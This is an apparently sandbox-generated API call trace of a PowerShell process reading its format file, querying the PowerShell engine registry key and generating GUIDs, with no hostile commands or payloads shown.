	[0054.904] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0054.904] GetLastError () returned 0x0
	[0054.904] GetFileType (hFile=0x2fc) returned 0x1
	[0054.904] SetErrorMode (uMode=0x1) returned 0x1
	[0054.904] GetFileType (hFile=0x2fc) returned 0x1
	[0054.904] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.906] GetLastError () returned 0x0
	[0054.906] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.906] GetLastError () returned 0x0
	[0054.907] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.907] GetLastError () returned 0x0
	[0054.907] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.907] GetLastError () returned 0x0
	[0054.907] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.907] GetLastError () returned 0x0
	[0054.908] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.909] GetLastError () returned 0x0
	[0054.909] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.909] GetLastError () returned 0x0
	[0054.909] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.909] GetLastError () returned 0x0
	[0054.909] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.909] GetLastError () returned 0x0
	[0054.911] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.911] GetLastError () returned 0x0
	[0054.911] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.911] GetLastError () returned 0x0
	[0054.912] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.912] GetLastError () returned 0x0
	[0054.912] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.912] GetLastError () returned 0x0
	[0054.912] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.912] GetLastError () returned 0x0
	[0054.916] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.916] GetLastError () returned 0x0
	[0054.916] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.916] GetLastError () returned 0x0
	[0054.916] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.916] GetLastError () returned 0x0
	[0054.919] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.919] GetLastError () returned 0x0
	[0054.920] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.920] GetLastError () returned 0x0
	[0054.920] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.920] GetLastError () returned 0x0
	[0054.920] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.920] GetLastError () returned 0x0
	[0054.920] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0xe67, lpOverlapped=0x0) returned 1
	[0054.920] GetLastError () returned 0x0
	[0054.921] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dc59b, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dc59b*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.921] GetLastError () returned 0x0
	[0054.921] ReadFile (in: hFile=0x2fc, lpBuffer=0x27dcf94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x27dcf94*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.921] GetLastError () returned 0x0
	[0054.921] CloseHandle (hObject=0x2fc) returned 1
	[0054.921] GetLastError () returned 0x0
	[0054.921] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27fd824 | out: lpFileInformation=0x27fd824*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0054.921] GetLastError () returned 0x0
	[0054.921] SetErrorMode (uMode=0x1) returned 0x1
	[0054.921] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e218 | out: phkResult=0x22e218*=0x2fc) returned 0x0
	[0054.932] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x0, lpcbData=0x22e25c*=0x0 | out: lpType=0x22e260*=0x1, lpData=0x0, lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.932] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x3c3520, lpcbData=0x22e25c*=0x56 | out: lpType=0x22e260*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.932] RegCloseKey (hKey=0x2fc) returned 0x0
	[0054.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0054.932] GetLastError () returned 0x0
	[0054.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0054.932] GetLastError () returned 0x0
	[0054.933] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xf817cd8c, Data2=0x3a40, Data3=0x450e, Data4=([0]=0x8e, [1]=0xe8, [2]=0xa0, [3]=0x5, [4]=0x3f, [5]=0x24, [6]=0x2e, [7]=0x5b))) returned 0x0
	[0054.934] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x612c13ff, Data2=0x2e70, Data3=0x4495, Data4=([0]=0x96, [1]=0x10, [2]=0x77, [3]=0x99, [4]=0x6d, [5]=0xa3, [6]=0x7e, [7]=0xa7))) returned 0x0
	[0054.934] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x69fcc530, Data2=0x44eb, Data3=0x4528, Data4=([0]=0x93, [1]=0x51, [2]=0xe2, [3]=0x98, [4]=0xef, [5]=0x7d, [6]=0x77, [7]=0x88))) returned 0x0
	[0054.934] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x69ec8c9d, Data2=0xe814, Data3=0x40fc, Data4=([0]=0xad, [1]=0x8c, [2]=0x29, [3]=0xd, [4]=0xdc, [5]=0xc9, [6]=0x76, [7]=0xc))) returned 0x0
	[0054.934] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xbb6a0abf, Data2=0xbf11, Data3=0x427b, Data4=([0]=0xb2, [1]=0x18, [2]=0xed, [3]=0x6e, [4]=0xf1, [5]=0x27, [6]=0x5, [7]=0xae))) returned 0x0
	[0054.934] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xa662387a, Data2=0x5c12, Data3=0x499c, Data4=([0]=0x8b, [1]=0x77, [2]=0x8c, [3]=0x8c, [4]=0xc2, [5]=0xac, [6]=0x61, [7]=0xcd))) returned 0x0
	[0054.934] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x53795134, Data2=0xe864, Data3=0x4dab, Data4=([0]=0xb1, [1]=0x2a, [2]=0x7c, [3]=0x66, [4]=0x8b, [5]=0xe8, [6]=0x4a, [7]=0xfa))) returned 0x0
	[0054.934] VirtualQuery (in: lpAddress=0x22cfe0, lpBuffer=0x22dfe0, dwLength=0x1c | out: lpBuffer=0x22dfe0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.935] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xa526359d, Data2=0xcd96, Data3=0x4ee0, Data4=([0]=0xac, [1]=0x48, [2]=0xfa, [3]=0x2c, [4]=0x30, [5]=0xc5, [6]=0x3f, [7]=0x68))) returned 0x0
	[0054.935] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x2e8d469e, Data2=0xd3ec, Data3=0x4f20, Data4=([0]=0xa8, [1]=0x4b, [2]=0x85, [3]=0x4b, [4]=0x76, [5]=0x72, [6]=0x6b, [7]=0xbe))) returned 0x0
	[0054.935] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x2696060a, Data2=0x4e6f, Data3=0x46b0, Data4=([0]=0xa5, [1]=0xd1, [2]=0x77, [3]=0x68, [4]=0xf0, [5]=0xb0, [6]=0x8e, [7]=0xf1))) returned 0x0
	[0054.935] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x6ad6675d, Data2=0x2db5, Data3=0x470b, Data4=([0]=0x81, [1]=0xdd, [2]=0xff, [3]=0x75, [4]=0xb3, [5]=0x83, [6]=0x53, [7]=0x5d))) returned 0x0
	[0054.935] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xee93d9b9, Data2=0xcce1, Data3=0x4779, Data4=([0]=0x94, [1]=0xf5, [2]=0xcc, [3]=0x2f, [4]=0x5a, [5]=0xbc, [6]=0x61, [7]=0xe6))) returned 0x0
	[0054.935] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x84c076dd, Data2=0xd8c3, Data3=0x4649, Data4=([0]=0xa8, [1]=0x5c, [2]=0x57, [3]=0x38, [4]=0x5f, [5]=0x27, [6]=0xde, [7]=0x5c))) returned 0x0
	[0054.935] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x52f7e561, Data2=0xb38c, Data3=0x4f8b, Data4=([0]=0xbc, [1]=0x2f, [2]=0x8a, [3]=0xde, [4]=0x97, [5]=0x35, [6]=0xdb, [7]=0x4b))) returned 0x0
	[0054.936] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xbc008f27, Data2=0x2407, Data3=0x4fdb, Data4=([0]=0xba, [1]=0x9, [2]=0x28, [3]=0x1d, [4]=0x3b, [5]=0xc9, [6]=0xa0, [7]=0x4d))) returned 0x0
	[0054.936] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x65b6f58, Data2=0x5ce6, Data3=0x42a5, Data4=([0]=0x89, [1]=0x89, [2]=0xef, [3]=0xeb, [4]=0xd5, [5]=0x63, [6]=0x39, [7]=0x47))) returned 0x0
	[0054.936] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x8ad39fab, Data2=0x31bd, Data3=0x4d7b, Data4=([0]=0xaf, [1]=0xc6, [2]=0x2f, [3]=0x3, [4]=0xde, [5]=0x7e, [6]=0x5e, [7]=0x4e))) returned 0x0
	[0054.936] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x20627fd9, Data2=0x3632, Data3=0x4f45, Data4=([0]=0xb6, [1]=0x17, [2]=0xb8, [3]=0x74, [4]=0x25, [5]=0x68, [6]=0xe6, [7]=0x30))) returned 0x0
	[0054.936] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xf7ccbcec, Data2=0x559f, Data3=0x4105, Data4=([0]=0x86, [1]=0x36, [2]=0xc3, [3]=0x98, [4]=0x92, [5]=0x62, [6]=0x18, [7]=0xf6))) returned 0x0
	[0054.936] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.937] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.937] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.937] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x71297dcf, Data2=0x980e, Data3=0x4c33, Data4=([0]=0x8d, [1]=0x30, [2]=0x98, [3]=0x61, [4]=0x6e, [5]=0x66, [6]=0x15, [7]=0xec))) returned 0x0
	[0054.937] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xd7f147d3, Data2=0xf4e6, Data3=0x49cd, Data4=([0]=0xb6, [1]=0x9b, [2]=0x34, [3]=0xb5, [4]=0xe1, [5]=0x7b, [6]=0x5d, [7]=0xba))) returned 0x0
	[0054.937] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x7f60b2b4, Data2=0xf1ba, Data3=0x4b95, Data4=([0]=0x99, [1]=0xc8, [2]=0x4e, [3]=0x17, [4]=0xe1, [5]=0x8c, [6]=0x46, [7]=0x9))) returned 0x0
	[0054.938] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x4a51a88d, Data2=0x2260, Data3=0x4de8, Data4=([0]=0xa8, [1]=0x72, [2]=0x89, [3]=0x9e, [4]=0x42, [5]=0x98, [6]=0x65, [7]=0xa5))) returned 0x0
	[0054.938] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x962d921f, Data2=0x2a75, Data3=0x4010, Data4=([0]=0x9b, [1]=0xb6, [2]=0x9f, [3]=0x16, [4]=0x47, [5]=0x93, [6]=0x49, [7]=0x23))) returned 0x0
	[0054.938] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xc3feb908, Data2=0x1e2b, Data3=0x4fca, Data4=([0]=0x8f, [1]=0x49, [2]=0x13, [3]=0xfc, [4]=0x22, [5]=0x4, [6]=0x77, [7]=0xf1))) returned 0x0
	[0054.938] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x843b2ffd, Data2=0xa154, Data3=0x46b5, Data4=([0]=0xa7, [1]=0xeb, [2]=0xeb, [3]=0x6e, [4]=0xba, [5]=0x91, [6]=0x8f, [7]=0xea))) returned 0x0
	[0054.938] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x586a3750, Data2=0x90e5, Data3=0x4c52, Data4=([0]=0xb9, [1]=0xb8, [2]=0xb6, [3]=0xe6, [4]=0x18, [5]=0xb4, [6]=0x47, [7]=0xbe))) returned 0x0
	[0054.938] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xa0d3bcd1, Data2=0xfbf, Data3=0x4672, Data4=([0]=0x94, [1]=0xa4, [2]=0x33, [3]=0x9b, [4]=0xfc, [5]=0xa0, [6]=0x43, [7]=0x57))) returned 0x0
	[0054.938] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x3e89e879, Data2=0x5204, Data3=0x4daa, Data4=([0]=0xac, [1]=0x5, [2]=0x94, [3]=0x26, [4]=0x28, [5]=0xb5, [6]=0xe4, [7]=0xf4))) returned 0x0
	[0054.939] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x7363608f, Data2=0xdc20, Data3=0x482a, Data4=([0]=0xbf, [1]=0xf3, [2]=0x36, [3]=0x35, [4]=0x2f, [5]=0x73, [6]=0xca, [7]=0x91))) returned 0x0
	[0054.939] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x5f73b391, Data2=0xec8f, Data3=0x4e7b, Data4=([0]=0xae, [1]=0xb7, [2]=0xa3, [3]=0x26, [4]=0xe5, [5]=0x67, [6]=0xf4, [7]=0xdb))) returned 0x0
	[0054.939] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xd4c2913, Data2=0x20a2, Data3=0x4c47, Data4=([0]=0xbb, [1]=0xc, [2]=0x6c, [3]=0xda, [4]=0x6, [5]=0x61, [6]=0xf5, [7]=0x1f))) returned 0x0
	[0054.939] VirtualQuery (in: lpAddress=0x22cfe0, lpBuffer=0x22dfe0, dwLength=0x1c | out: lpBuffer=0x22dfe0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.939] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x40d5f408, Data2=0xbda4, Data3=0x4343, Data4=([0]=0x98, [1]=0x1b, [2]=0xb9, [3]=0x98, [4]=0xe8, [5]=0x42, [6]=0x14, [7]=0x1f))) returned 0x0
	[0054.939] VirtualQuery (in: lpAddress=0x22cfe0, lpBuffer=0x22dfe0, dwLength=0x1c | out: lpBuffer=0x22dfe0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.942] VirtualQuery (in: lpAddress=0x22cfe0, lpBuffer=0x22dfe0, dwLength=0x1c | out: lpBuffer=0x22dfe0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.945] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x2e409a9f, Data2=0x95fb, Data3=0x4a4c, Data4=([0]=0xa5, [1]=0x0, [2]=0xd6, [3]=0xd3, [4]=0xaa, [5]=0x60, [6]=0x32, [7]=0x51))) returned 0x0
	[0054.945] VirtualQuery (in: lpAddress=0x22cfe0, lpBuffer=0x22dfe0, dwLength=0x1c | out: lpBuffer=0x22dfe0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.945] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x65033ed9, Data2=0xe39f, Data3=0x4dd7, Data4=([0]=0xba, [1]=0xfa, [2]=0x95, [3]=0x34, [4]=0x6, [5]=0x88, [6]=0xe8, [7]=0x6))) returned 0x0
	[0054.945] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x5e0c8ab, Data2=0x6986, Data3=0x42b4, Data4=([0]=0xac, [1]=0x3f, [2]=0xc, [3]=0x2e, [4]=0x4e, [5]=0x2d, [6]=0x8b, [7]=0x7c))) returned 0x0
	[0054.945] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xed42085c, Data2=0x8aa6, Data3=0x4498, Data4=([0]=0x9e, [1]=0x3f, [2]=0xba, [3]=0xfd, [4]=0xc2, [5]=0x27, [6]=0xa4, [7]=0x6f))) returned 0x0
	[0054.945] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x493b6785, Data2=0xc311, Data3=0x42f6, Data4=([0]=0xb7, [1]=0x2b, [2]=0xa, [3]=0x4a, [4]=0xbb, [5]=0xa8, [6]=0x51, [7]=0x76))) returned 0x0
	[0054.946] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x58d62350, Data2=0x6fc8, Data3=0x48b7, Data4=([0]=0xb3, [1]=0x6, [2]=0xcb, [3]=0x2b, [4]=0x24, [5]=0x53, [6]=0x94, [7]=0xb7))) returned 0x0
	[0054.946] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x5c3e071c, Data2=0xf370, Data3=0x49d8, Data4=([0]=0xa2, [1]=0xac, [2]=0x1e, [3]=0x6a, [4]=0x58, [5]=0xd3, [6]=0x7, [7]=0xf7))) returned 0x0
	[0054.946] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x412859d8, Data2=0xc9f9, Data3=0x4ede, Data4=([0]=0xb8, [1]=0x98, [2]=0x20, [3]=0x51, [4]=0x71, [5]=0x5a, [6]=0xd3, [7]=0xed))) returned 0x0
	[0054.946] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.946] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x1c31ac94, Data2=0xc08, Data3=0x443d, Data4=([0]=0xaa, [1]=0x46, [2]=0x54, [3]=0xd, [4]=0xed, [5]=0xc8, [6]=0x97, [7]=0x14))) returned 0x0
	[0054.946] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x377ca0d5, Data2=0xde1f, Data3=0x4ddd, Data4=([0]=0xa7, [1]=0x6b, [2]=0xe8, [3]=0x74, [4]=0x5e, [5]=0xfe, [6]=0xa8, [7]=0xce))) returned 0x0
	[0054.947] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x1a66edd, Data2=0x876e, Data3=0x4345, Data4=([0]=0x90, [1]=0xce, [2]=0xc8, [3]=0xb0, [4]=0x91, [5]=0xb1, [6]=0x18, [7]=0xf2))) returned 0x0
	[0054.947] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x250738c, Data2=0x8354, Data3=0x4dcf, Data4=([0]=0x8f, [1]=0x13, [2]=0xea, [3]=0xfc, [4]=0x88, [5]=0xf1, [6]=0x91, [7]=0xe1))) returned 0x0
	[0054.947] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xa5b53f5, Data2=0xce7e, Data3=0x498d, Data4=([0]=0x94, [1]=0x9, [2]=0xe6, [3]=0xdd, [4]=0xf0, [5]=0x82, [6]=0x74, [7]=0xb3))) returned 0x0
	[0054.947] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.947] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xe42699ee, Data2=0x60f3, Data3=0x4634, Data4=([0]=0xbc, [1]=0x30, [2]=0x9, [3]=0x8f, [4]=0xcd, [5]=0x6f, [6]=0x6f, [7]=0x7))) returned 0x0
	[0054.947] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x96ccf097, Data2=0xe875, Data3=0x4dfb, Data4=([0]=0x99, [1]=0x6a, [2]=0xfe, [3]=0xd3, [4]=0x73, [5]=0xbd, [6]=0x76, [7]=0x90))) returned 0x0
	[0054.947] VirtualQuery (in: lpAddress=0x22cfe8, lpBuffer=0x22dfe8, dwLength=0x1c | out: lpBuffer=0x22dfe8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
